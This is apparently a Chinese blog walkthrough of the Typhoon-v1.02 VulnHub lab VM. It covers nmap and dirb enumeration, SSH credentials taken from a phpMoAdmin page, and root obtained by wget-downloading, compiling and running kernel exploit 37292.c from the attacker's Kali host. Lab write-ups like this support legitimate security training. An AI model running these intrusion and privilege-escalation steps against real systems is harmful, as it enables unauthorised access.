【VulnHub系列】Typhoon-v1.02靶机

Typhoon-v1.02靶机

环境:下载靶机、解压、VMware打开,并将其和kali虚拟机的网络调成NAT模式

一.明确目标

探测目标主机IP情况

nmap 192.168.153.0/24

在这里插入图片描述

目标主机IP:192.168.153.138

Kali的IP:192.168.153.129

二.信息搜集

Nmap 进行常规端口开放扫描

进行namp全端口服务枚举

nmap 192.168.153.138  -p-  -A

在这里插入图片描述在这里插入图片描述在这里插入图片描述在这里插入图片描述

可以看到开放了非常多的端口

nmap输出显示各种开放端口:21(ftp,可以匿名访问的)、22(ssh)、25(smtp)、53(domain)、80(http)、110(pop3)、111(rpcbind)、139(netbios-ssn)、 143(imap)、445(netbios-ssn)、631(ipp)、993(ssl/imaps)、995(ssl/pop3)、2049(nfs_acl)、3306(mysql)、5432(postgrespl)、8080(http) 、6379(redis)、27017(mongodb)

对该网站目录进行爆破枚举,利用到的是kali上的dirb:

dirb http://192.168.153.138

在这里插入图片描述

http://192.168.153.138/cms/

http://192.168.153.138/drupal/

http://192.168.153.138/phpmyadmin/

http://192.168.153.138/javascript/

http://192.168.153.138/robots.txt

通过dirb对目标网站进行扫描发现存在phpmyadmin以及robots.txt和drupal,cms等目录文件

登录http://192.168.153.138/robots.txt网站发现了/mongoadmin/目录文件
在这里插入图片描述

输入到url中:http://192.168.153.138/mongoadmin

(phpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具,可用于创建、删除和修改数据库和索引,提供视图和数据搜索工具,提供数据库启动时间和内存的统计,支持JSON 格式数据的导入导出。)

在这里插入图片描述

在界面多点击几次后等待会出现creds选项:

在这里插入图片描述

发现了:

[username] => typhoon

[password] => 789456123

再尝试一下ssh登录,成功登录。

ssh typhoon@192.168.153.138

在这里插入图片描述

查看有没有敏感文件或者敏感信息

在这里插入图片描述在这里插入图片描述在这里插入图片描述
发现没有什么可以利用的!!!!

三.近一步权限提升

于是考虑内核是否存在漏洞

uname -a

在这里插入图片描述

发现Linux 3.13.0版本

在Kali中查找查找漏洞

searchsploit  3.13.0

在这里插入图片描述

下载37292.c脚本来利用

searchsploit -m 37292.c 

在这里插入图片描述

进入到/usr/share/exploitdb/exploits/linux/local下,将37292.c复制到root家目录下

cp 37292.c  /root

打开Kali网站服务

在这里插入图片描述

在靶机中使用wget从Kali上下载37292.c脚本首先靶机进入/tmp目录下

wget http://192.168.153.129:8000/37292.c

在这里插入图片描述

使用gcc命令对.c脚本进行编译并重命名为exp

gcc 37292.c -o exp

在这里插入图片描述

再给exp文件所有权限,之后再运行exp文件

chmod +777  exp
./exp

在这里插入图片描述

成功获取Root权限!!!!!!!!!!!!!!!

四.总结

1)信息收集

1、nmap信息挖掘。2、挖掘HTTP服务信息。3、搜寻页面有用的信息。

2)根据网页信息提示尝试ssh远程登录

3)提权:

1、内核提权

([注:此靶机有很多种漏洞,例如nmap全端口信息枚举、drupal漏洞利用、SSH端口爆破、phpMoAdmin利用、LotusCMS漏洞利用、Tomca漏洞利用、Shellshock漏洞利用、NSF漏洞利用、5432 PostgreSQL漏洞利用、Samba远程代码执行漏洞(CVE-2017-7494)Linux版永恒之蓝 445端口(139端口)、25端口DNS漏洞利用-区域攻击等等)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gaynell

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值